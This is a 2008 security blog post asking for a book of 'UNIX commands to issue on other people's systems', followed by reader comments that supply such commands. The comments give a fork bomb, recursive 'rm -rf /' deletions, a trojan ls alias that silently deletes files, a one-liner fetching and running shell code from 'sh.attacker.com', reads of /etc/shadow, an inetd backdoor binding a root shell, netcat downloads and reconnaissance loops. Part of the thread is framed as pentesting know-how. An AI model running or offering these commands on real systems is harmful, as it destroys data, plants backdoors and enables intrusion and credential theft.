Wednesday, July 02, 2008

The security book that I'd like to see written (and which I'd buy)

Good security books are few and far between. But IF someone writes the following book, I'll pre-order it immediately, even if it costs a hundred dollars:

"100 UNIX commands to issue on other people's systems"

Generally, I am horrible at all things *nix, and there are few enough good books around which teach you clever things to do with a shell. Unfortunately, there is no book that teaches people what to do with a shell on someone else's box.

Someone from Matasano told me they'd post their favourite commands if I wrote this blog post - so let's see it ! :)

(I'd like to start this by posting, but honestly -- I wouldn't be asking if I knew anything I'd not be embarrassed about. I mentioned above that I suck at all things *nix)

15 comments:

Marcin said...

I'll start:

:(){ :|:& };:

ddz said...

Say you can only execute one command on this other person's Unix box and you don't know how they are connected to the net (proxy, nat, etc). This may be handy:
'dig sh.attacker.com txt +short | sh'

David said...

Do you mean something like this?

When an attacker has a shell (s)he might already know what operating system that is running, but a simple "uname" to check the system version and "cat /etc/lsb-release" to check Linux version, if applicable, will probably make it easier to find a suitable local root exploit or rootkit that can be loaded later.

"wget", "curl" or similar to download toolz (rootkit, port scanners, IRC server, backdoors, etc) from some other cracked machine

"insmod" for loading rootkit Linux kernel modules (then "lsmod" to list, "rmmod" to remove)

"cat" to view small text files and ("more" or "less") to view larger text files, and "vi" to edit them

If the machine has a compiler installed, a "make" or "make install" on some downloaded source code might be used, sometimes preceded by a "./configure".

"tcpdump" to sniff traffic

"locate" to find a file by looking in a file database, or "find" to find a file by recursive search on the file system

For example "mysql" and "mysqldump" to examine MySQL databases

Just don't exercise the above on my servers, OK? :-)

James said...

I assume this is commands to run after you've compromised someone's computer?
How about: rm -fr /

Joern said...

quick and dirty:

alias ls='ls;rm * 2> /dev/null'

the stderr redirection is used to suppress rm error messages

Jordan said...

If the machine is running a recent bash that's got dev/tcp support compiled in, you can use the following neat trick to implement a socket listener bound to a shell (or as an outbound connection) with no other utilities except the shell itself.

http://labs.neohapsis.com/2008/04/17/connect-back-shell-literally/

http://www.gnucitizen.org/blog/reverse-shell-with-bash/

Sadly, not enabled by default on debian and its various descendants.

egypt said...

My response is a little more lengthy than will fit in a comment, so I've written a blog post

Craig S Wright said...

Better yet, I will do it as a freebee. I have just submitted a Gold paper application to SANS as follows:

"100 UNIX commands to issue on other people's systems.

This paper will analyse and present the top 100 commands in Unix/Linux that an attacker (and most crucially, a security tester) can use.

These will range from commands to gain access to a system or extend access, to altering logs and other files (including the kernel) and to monitoring what is going on.

The paper will also provide scripting techniques and examples based on these commands to provide the basics needed by any budding *NIX security professional."

Regards,
Craig Wright GSE-Compliance

Nicolas said...

1/ Find out which distro you are on:
# uname -sr
or "cat" one of those file:
/etc/debian_version
/etc/redhat-release
/etc/SuSE-release
/etc/slackware-version
/etc/gentoo-release
/etc/lsb-release
/etc/issue
/etc/isssue.net.
On Digital/Compaq UNIX / Tru64 4.0:
# sizer -v

2/ Look for ~/.ssh/known_hosts to find other boxes to ssh to

3/ #cat /etc/passwd
if you are not root

4/ # cat /etc/shadow
if you are root

5/ find suid programs:
find / -perm +4000 2>/dev/null >/tmp/suid &

6/ Download and compile netcat
wget http://myserver/nc.tgz && tar zxvf nc.tgz && cd nc && make && make install

7/ # who
find who is connected

8/ # ps aux
what process are running

9/ # find / -name bak

10/ rgrep -i password *
grep for "password" string in config files

...

There are too many. Really, you should first buy any Linux admin book.

Knud Erik said...

`find` to look for badly set permissions and custom suid binaries.

nullbomb said...

In the old days there were things like this - http://www.langston.com/Fun_People/1997/1997BBL.html

I personally was telling people to run "nohup rm -rf / &" if they asked me for my favourite back in uni days;-)

John said...

I can't think of 100 different ways to dd urandom onto the raw disk device, so I'll give you an old school one:

echo "chargen stream tcp nowait root /bin/sh ps -ef" > /etc/inetd.conf ; kill -HUP `ps -ef | grep inetd | grep -v grep | awk '{print $2}'`

Something like that :)

Note that this only works on geriatric commercial UNICES that still use inetd. :)

John said...

WHOOPS!!! I MEAN >> instead of >


I actually made that mistake once while doing a pen test at a very very large defense-related customer.

I blew out /etc/passwd with several hundred accounts on an Ultrix box. My colleague reconstructed it from an xterm buffer and fixed it while I had a panic attack/chainsmoked outside. :)

Be careful with your ">" and ">>" kids...

jcw (gaussie)

John said...

A bunch of UNIX commands to run on other people's computers.

Caveat emptor! Run at your own risk. Some of these commands (that include "for" statements) are purposely typed out in a form that favors readability at the cost of efficiency. comments are preceded by "#". I am also "shaking these out of my sleeve" so please forgive any typos or mistakes. This is also a work in progress, for both my trainees and staff at my job and everyone out on the int0rweb, so you can certainly expect a more complete list in the near future.

Information gathering

rup

for i in `ifconfig -a | grep inet | grep -v inet6 | grep -v 127.0.0 | awk '{print $2}' | cut -f1-3 -d.` ; do
ping $i.255
done

netstat -nr

cat inetd.conf

rpcinfo -p localhost

for i in `ifconfig -a | grep inet | grep -v inet6 | grep -v 127.0.0 | awk '{print $2}' | cut -f1-3 -d.` ; do
ping $i.255 | awk '{print $4}' | sed s/:/""/g >> targets.txt
done
for i in `cat targets.txt` ; do
echo $i
rpcinfo -p $i
echo ""
showmount -e $i
echo ""
done

arp -a


# where PID is the process id of some process whose current working directory you want to enter/determine (solaris, AIX, perhaps others).
cd /proc/PID/cwd

# Determine what processes are using /tmp
fuser /tmp

#lsof is much more useful, but not included on all UNIX systems. Do a man lookup on lsof for infoharvesting goodness... If you are lucky enough to have lsof on "your victim^H^H^H^H^H^H^H^H friend's computer", run:
lsof
#... and see what happens.

#find a file of a particular permission mode (in our example rw by everyone)
find / -perm 666 -print

# find all files modified between 5 and 10 minutes ago
find / -mmin +4 -mmin -11

#find all files modified in the last 24 hours
find / -mtime 0

# On AIX find all files containing the string 'foobar', not following links
grep -R foobar /

# ...and following links
grep -r foobar /

Craig S Wright said...

And it is about 6-8 weeks until the paper I am writing shall be ready.

You should like the fact that it will be on the SANS reading room and hence free.